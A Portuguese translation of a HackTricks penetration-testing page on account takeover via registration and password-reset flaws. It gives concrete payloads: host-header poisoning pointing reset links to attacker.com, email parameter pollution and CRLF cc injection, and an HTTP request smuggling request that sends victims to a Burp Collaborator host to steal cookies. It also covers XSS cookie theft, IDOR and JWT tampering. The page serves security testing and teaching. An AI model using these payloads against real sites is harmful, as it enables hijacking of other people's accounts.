11 KiB
Vulnerabilidades de Registro e Apropriação
Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras maneiras de apoiar o HackTricks:
- Se você deseja ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, verifique os PLANOS DE ASSINATURA!
- Adquira o swag oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção exclusiva de NFTs
- Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-nos no Twitter 🐦 @carlospolopm.
- Compartilhe seus truques de hacking enviando PRs para HackTricks e HackTricks Cloud github repos.
WhiteIntel
WhiteIntel é um mecanismo de busca alimentado pela dark web que oferece funcionalidades gratuitas para verificar se uma empresa ou seus clientes foram comprometidos por malwares de roubo.
O principal objetivo do WhiteIntel é combater a apropriação de contas e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
Apropriação de Registro
Registro Duplicado
- Tente gerar usando um nome de usuário existente
- Verifique variando o e-mail:
- maiúsculas
- +1@
- adicione algum ponto no e-mail
- caracteres especiais no nome do e-mail (%00, %09, %20)
- Coloque caracteres em preto após o e-mail:
test@test.com a
- vítima@gmail.com@atacante.com
- vítima@atacante.com@gmail.com
Enumeração de Usuário
Verifique se você pode descobrir quando um nome de usuário já foi registrado dentro da aplicação.
Política de Senhas
Ao criar um usuário, verifique a política de senhas (verifique se é possível usar senhas fracas).
Nesse caso, você pode tentar forçar credenciais.
Injeção de SQL
Verifique esta página para aprender como tentar apropriação de contas ou extrair informações via Injeções de SQL em formulários de registro.
Apropriações de Oauth
{% content-ref url="oauth-to-account-takeover.md" %} oauth-to-account-takeover.md {% endcontent-ref %}
Vulnerabilidades de SAML
{% content-ref url="saml-attacks/" %} saml-attacks {% endcontent-ref %}
Alterar E-mail
Após o registro, tente alterar o e-mail e verifique se essa alteração é validada corretamente ou se pode ser alterada para e-mails arbitrários.
Mais Verificações
- Verifique se você pode usar e-mails descartáveis
- Senha longa (>200) leva a DoS
- Verifique limites de taxa na criação de contas
- Use username@burp_collab.net e analise o callback
Apropriação de Redefinição de Senha
Vazamento de Token de Redefinição de Senha Via Referenciador
- Solicite a redefinição de senha para seu endereço de e-mail
- Clique no link de redefinição de senha
- Não altere a senha
- Clique em qualquer site de terceiros (por exemplo: Facebook, Twitter)
- Interceptar a solicitação no proxy Burp Suite
- Verifique se o cabeçalho referer está vazando o token de redefinição de senha.
Envenenamento de Redefinição de Senha
- Interceptar a solicitação de redefinição de senha no Burp Suite
- Adicione ou edite os seguintes cabeçalhos no Burp Suite:
Host: attacker.com
,X-Forwarded-Host: attacker.com
- Encaminhe a solicitação com o cabeçalho modificado
http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
- Procure por uma URL de redefinição de senha com base no host header como:
https://attacker.com/reset-password.php?token=TOKEN
Redefinição de Senha Via Parâmetro de E-mail
# parameter pollution
email=victim@mail.com&email=hacker@mail.com
# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}
# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
IDOR em Parâmetros da API
- O atacante deve fazer login com sua conta e acessar a funcionalidade de Alterar senha.
- Inicie o Burp Suite e Interceptar a requisição.
- Envie-a para a aba repeater e edite os parâmetros: ID do usuário/email
powershell POST /api/changepass [...] ("form": {"email":"vítima@email.com","password":"senhasegura"})
Token de Redefinição de Senha Fraco
O token de redefinição de senha deve ser gerado aleatoriamente e único a cada vez.
Tente determinar se o token expira ou se é sempre o mesmo, em alguns casos o algoritmo de geração é fraco e pode ser adivinhado. As seguintes variáveis podem ser usadas pelo algoritmo.
- Timestamp
- ID do Usuário
- E-mail do Usuário
- Nome e Sobrenome
- Data de Nascimento
- Criptografia
- Apenas números
- Sequência de token pequena (caracteres entre [A-Z,a-z,0-9])
- Reutilização de token
- Data de expiração do token
Vazamento de Token de Redefinição de Senha
- Acione uma solicitação de redefinição de senha usando a API/UI para um e-mail específico, por exemplo: test@mail.com
- Inspecione a resposta do servidor e verifique o
resetToken
- Em seguida, use o token em uma URL como
https://exemplo.com/v3/user/password/reset?resetToken=[O_RESET_TOKEN]&email=[O_EMAIL]
Redefinição de Senha Via Colisão de Nome de Usuário
- Registre-se no sistema com um nome de usuário idêntico ao nome de usuário da vítima, mas com espaços em branco inseridos antes e/ou depois do nome de usuário. Por exemplo:
"admin "
- Solicite uma redefinição de senha com seu nome de usuário malicioso.
- Use o token enviado para seu e-mail e redefina a senha da vítima.
- Conecte-se à conta da vítima com a nova senha.
A plataforma CTFd estava vulnerável a esse ataque.
Veja: CVE-2020-7245
Assunção de Conta Via Cross Site Scripting
- Encontre um XSS dentro do aplicativo ou de um subdomínio se os cookies estiverem limitados ao domínio pai:
*.dominio.com
- Vaze o cookie de sessões atual
- Autentique-se como o usuário usando o cookie
Assunção de Conta Via HTTP Request Smuggling
- Use o smuggler para detectar o tipo de HTTP Request Smuggling (CL, TE, CL.TE)
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
\ - Crie uma requisição que sobrescreverá o
POST / HTTP/1.1
com os seguintes dados:
GET http://algo.burpcollaborator.net HTTP/1.1 X:
com o objetivo de redirecionar as vítimas para o burpcollab e roubar seus cookies\ - A requisição final pode se parecer com o seguinte:
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0
GET http://something.burpcollaborator.net HTTP/1.1
X: X
Tomada de Conta da Conta via CSRF
- Crie um payload para o CSRF, por exemplo: "Formulário HTML com envio automático para alteração de senha"
- Envie o payload
Tomada de Conta da Conta via JWT
O Token JSON Web pode ser usado para autenticar um usuário.
- Edite o JWT com outro ID de Usuário / E-mail
- Verifique a assinatura fraca do JWT
{% content-ref url="hacking-jwt-json-web-tokens.md" %} hacking-jwt-json-web-tokens.md {% endcontent-ref %}
Referências
WhiteIntel
WhiteIntel é um mecanismo de busca alimentado pela dark web que oferece funcionalidades gratuitas para verificar se uma empresa ou seus clientes foram comprometidos por malwares de roubo.
O principal objetivo do WhiteIntel é combater tomadas de conta e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode verificar o site deles e experimentar o mecanismo de busca deles de forma gratuita em:
{% embed url="https://whiteintel.io" %}
Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras maneiras de apoiar o HackTricks:
- Se você deseja ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF Confira os PLANOS DE ASSINATURA!
- Adquira o swag oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção exclusiva de NFTs
- Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-nos no Twitter 🐦 @carlospolopm.
- Compartilhe seus truques de hacking enviando PRs para os repositórios HackTricks e HackTricks Cloud.